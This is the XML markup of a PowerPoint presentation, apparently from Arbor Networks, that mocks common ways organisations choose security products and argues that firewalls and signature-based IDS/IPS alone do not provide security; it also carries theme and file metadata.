          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0" smtClean="0"/>
              <a:t>Your buddy gave you a tip on the golf course?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Sales guy actually good</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>Have a really awesome security partner that gives you good advice?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500" dirty="0"/>
              <a:t>Have a really crappy security “partner” that just sells you a false sense of security?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Marketing actually worked?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compliance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Directives</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="386902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Many Orgs Pick These Products?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="5267302"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Scenario 1: I am doing security for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>realz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> this year, what should I buy?  I have $50K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Perception is that buying the blinking box will make them secure.  Forever.  And Always.  Guaranteed.  For $50K and no additional efforts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>Yay integrators and resellers for reinforcing this false sense of security!  Good job!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>2: &lt;CIO&gt; These audits are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>killin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>’ us, we need to buy IDS this year, go do it</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>How much?  Doesn’t matter, go do it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>But, how will we manage it?  Doesn’t matter, go do it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>But, we don’t have any skills in house that can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>tool?! Doesn’t matter, go do it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>&lt;CIO/Audit&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Sooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>…I can check the box now, right?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>&lt;Security Guy&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>Sooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>..you have heard of the term “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1" smtClean="0"/>
              <a:t>shelfware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" smtClean="0"/>
              <a:t>,” right?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Scenario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>3: Shite, why the H-E-DOUBLE HOCKEY STICKS DO I KEEP GETTING INFECTED??!??</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52659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Judge Security Products?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="328371" y="1017588"/>
            <a:ext cx="8489904" cy="4542782"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Pretty simple…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="9600" dirty="0" smtClean="0"/>
              <a:t>Threats</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Can it detect and/or stop them?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also, is it actually solving a problem?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360641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7187" y="5813313"/>
            <a:ext cx="7620563" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="da-DK" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7CBF31"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Firewalls Are not Security!</a:t>
            </a:r>
            <a:endParaRPr lang="da-DK" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7CBF31"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1062229"/>
            <a:ext cx="5758068" cy="4318551"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12697818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Silly House Analogy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="774700"/>
            <a:ext cx="9144000" cy="5297424"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3748780723"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Arb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Custom 6">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="404040"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="EEECE1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="0083A5"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="71B532"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="C9541F"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="9F1726"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FCD41B"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C0C0C0"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="217185"/>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24C49E37658D4E8A7D33BD70685F05" ma:contentTypeVersion="0" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="ae7c2a2cb338a7e1f67ec20a5d36ba9e">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53E60712-F4D9-4F0B-896A-5B9C1D7049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22476D49-9BB4-4BBB-BA78-E9F15DAF35F9}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{94FB4E63-5817-4D56-B67B-9C678A8244E1}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://purl.org/dc/terms/"/>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Arbor.potx</Template>
  <TotalTime>73435</TotalTime>
  <Words>2671</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>384</Paragraphs>
  <Slides>49</Slides>
  <Notes>17</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="4" baseType="variant">
      <vt:variant>
        <vt:lpstr>Theme</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>2</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>Slide Titles</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>49</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="51" baseType="lpstr">
      <vt:lpstr>Arbor</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Presenters Background</vt:lpstr>
      <vt:lpstr>Disclaimer</vt:lpstr>
      <vt:lpstr>How Do You Judge Security Products?</vt:lpstr>
      <vt:lpstr>How Do You Decide What To Buy?</vt:lpstr>
      <vt:lpstr>Why Do Many Orgs Pick These Products?</vt:lpstr>
      <vt:lpstr>How Do We Judge Security Products?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>The Silly House Analogy</vt:lpstr>
      <vt:lpstr>Firewall Analogy</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>A Better Analogy for Perimeter Security</vt:lpstr>
      <vt:lpstr>Firewalls</vt:lpstr>
      <vt:lpstr>Three Security Characteristics</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Firewalls</vt:lpstr>
      <vt:lpstr>Stateful Firewall &amp; IPS Failure Under DDoS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>IPS</vt:lpstr>
      <vt:lpstr>Threat Landscape Era’s</vt:lpstr>
      <vt:lpstr>Why Signatures Don’t Work</vt:lpstr>
      <vt:lpstr>What New Threats? Just New Techniques!</vt:lpstr>
      <vt:lpstr>Case-in-Point: JavaScript Obfuscation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What Happens When We Get Realistic?</vt:lpstr>
      <vt:lpstr>Evasion Baked-In</vt:lpstr>
      <vt:lpstr>Underground Economy Insight - UFOCrypt</vt:lpstr>
      <vt:lpstr>Evasion-as-a-Service</vt:lpstr>
      <vt:lpstr>Malware Software Development Lifecycle</vt:lpstr>
      <vt:lpstr>Bypassing Security Isn’t Difficult</vt:lpstr>
      <vt:lpstr>Other stuff</vt:lpstr>
      <vt:lpstr>Signatures</vt:lpstr>
      <vt:lpstr>Application Detection</vt:lpstr>
      <vt:lpstr>Policy/Management/Reporting</vt:lpstr>
      <vt:lpstr>Memory Lane</vt:lpstr>
      <vt:lpstr>Why IDS/IPS Never Worked</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Case Studies</vt:lpstr>
      <vt:lpstr>Case Studies</vt:lpstr>
      <vt:lpstr>What Would We Do?</vt:lpstr>
      <vt:lpstr>What We Wouldn’t Do</vt:lpstr>
      <vt:lpstr>What We Wouldn’t Do</vt:lpstr>
      <vt:lpstr>What To Do When Security Fails?</vt:lpstr>
      <vt:lpstr>Thank You!</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>Arbor Networks</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Gary Sockrider</dc:creator>
  <cp:lastModifiedBy>emartin</cp:lastModifiedBy>
  <cp:revision>519</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-12-05T15:49:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-06-06T17:04:12Z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0x0101002224C49E37658D4E8A7D33BD70685F05</vt:lpwstr>
  </property>
</Properties>
</file>